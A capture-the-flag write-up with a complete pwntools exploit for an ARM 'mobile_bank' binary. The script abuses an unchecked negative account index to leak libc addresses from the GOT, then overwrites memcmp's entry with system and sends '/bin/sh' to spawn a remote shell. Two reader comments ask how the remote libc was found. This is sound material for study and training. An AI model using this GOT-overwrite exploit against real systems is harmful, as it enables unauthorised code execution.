
The account index can be negative (it is not bounds-checked), which lets you leak libc addresses from the GOT, overwrite memcmp's GOT entry with system, and then enable debug with "/bin/sh" as the password.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
import monkeyhex

host = 'pwn-04.v7frkwrfyhsjtbpfcppnu.ctfz.one'  # challenge endpoint as given on the page
port = 1337
context.arch = 'arm'  # 32-bit ARM target; governs the word size used by p32/u32 below
context.log_level = 'INFO'
context.terminal = ['tmux', 'splitw', '-h']  # only used by the commented-out gdb.debug() path
# GDB script for local debugging (consumed only by the commented-out gdb.debug() call):
# a breakpoint at 0x1131c (the page does not say what that address is) and at memset.
gdbargs = """
b *0x1131c
b memset
continue
"""

def set_id(idx):
    """Select account ``idx`` via menu option 2 of the challenge binary.

    The index is sent verbatim. Per the page summary the binary accepts
    negative indices without a bounds check; the script below only calls
    this with 0, and ``leak()`` repeats the same exchange with a computed
    index.
    """
    p.sendline('2')
    p.recvuntil('id: ')
    p.sendline(str(idx))
    p.recvuntil('choice: ')  # consume the menu prompt so the next command is aligned

def set_note(note):
    """Store ``note`` on the currently selected account via menu option 3."""
    p.sendline('3')
    p.recvuntil('note: ')
    p.sendline(note)
    p.recvuntil('choice: ')  # consume the menu prompt so the next command is aligned

def leak(addr): # only for 0x..0 or 0x008, can read from value field
    """Read the 32-bit word at ``addr`` through the unchecked account index.

    Menu option 2 is given ``(addr - 0x22088) / 8`` as the account index, so
    0x22088 is presumably the address index 0 maps to (the account array)
    and each account record is 8 bytes wide; a negative index walks
    backwards into the GOT. Menu option 5 then prints the account's "value"
    field, which now aliases the word at ``addr``. That value is printed as
    a signed decimal, so it is re-packed with ``p32(..., sign='signed')``
    and returned as an unsigned integer via ``u32``.

    NOTE(review): ``/`` is integer division only on Python 2 (on Python 3
    ``str()`` of the float result would not be a valid index); the ``str``
    arguments passed to ``sendline`` likewise indicate a Python 2 pwntools
    setup. Also, the local ``leak`` variable shadows the function name
    inside its own body; it works, but is easy to misread.
    """
    p.sendline('2')
    p.recvuntil('id: ')
    # index relative to the base address, in 8-byte steps (negative for GOT entries)
    p.sendline(str((addr - 0x22088) / 8))
    p.recvuntil('choice: ')
    p.sendline('5')
    p.recvuntil('value: ')
    # the value is followed by '$, '; drop those three characters before parsing
    leak = p32(int(p.recvuntil('$, ')[:-3]), sign='signed')
    p.recvuntil('choice: ')
    return u32(leak)

# p = gdb.debug('./mobile_bank', gdbscript=gdbargs)  # local debugging alternative (see gdbargs above)
p = remote(host, port)
p.recvuntil('choice: ')  # wait for the first menu prompt

# Set up a valid account before any out-of-bounds indexing
set_id(0)
set_note("Hey!")

# Leak two GOT entries. The bracketed addresses are GOT slots in the binary;
# the hex values in the comments are sample values observed by the author.
# [0x22050] memcmp@GLIBC_2.4
# puts: 0xb6c8a6b1   (label looks stale: the line below leaks memcmp, not puts)
memcmp = leak(0x22050)
# [0x22038] strcpy@GLIBC_2.4
# strcpy: 0xb6c9a0c1
strcpy = leak(0x22038)

# LOCAL: offsets for the author's local libc (overridden by the REMOTE block below)
libc_base = strcpy - 0x73960
system = libc_base + 0x37600

# REMOTE: offsets for the remote libc; these assignments take effect because
# they come last. The page does not say how the remote libc was identified
# (the reader comments below ask the same question).
libc_base = strcpy - 0x560c0
system = libc_base + 0x2c584

log.success('strcpy: 0x%08x' % strcpy)
log.success('memcmp: 0x%08x' % memcmp)
log.success('libc: 0x%08x' % libc_base)
log.success('system: 0x%08x' % system)

# Amount that must be added to the memcmp GOT slot for it to hold system's
# address, reduced mod 2**32 so the difference is a non-negative 32-bit value
v = (system - memcmp) % 2**32

# leak() leaves the memcmp GOT slot selected as the current account; re-read
# it here so the log shows the value before modification
memcmp = leak(0x22050)
log.success('memcmp: 0x%08x' % memcmp)
# Menu option 4 appears to add the submitted amount to the current account's
# value (not shown on the page, inferred from the result). The amount is
# applied in chunks of at most 0x7fffffff, presumably the largest positive
# value the binary parses as a signed 32-bit integer.
while v > 0x7fffffff:
    p.sendline('4')
    p.recvuntil('value: ')
    p.sendline(str(0x7fffffff))
    v -= 0x7fffffff
p.sendline('4')
p.recvuntil('value: ')
p.sendline(str(v))
memcmp = leak(0x22050)
log.success('memcmp: 0x%08x' % memcmp) # <system>

# Menu option 6 is the debug entry named in the page summary; its password
# check goes through memcmp, whose GOT slot now points at system
p.sendline('6\n/bin/sh')

p.interactive()
```

bo8 — July 23, 2018, 11:16 a.m.

How do you know remote system's offset? The challenge doesn't provide libc.


Ne0 — July 23, 2018, 11:47 a.m.

how can u find the correct libc ?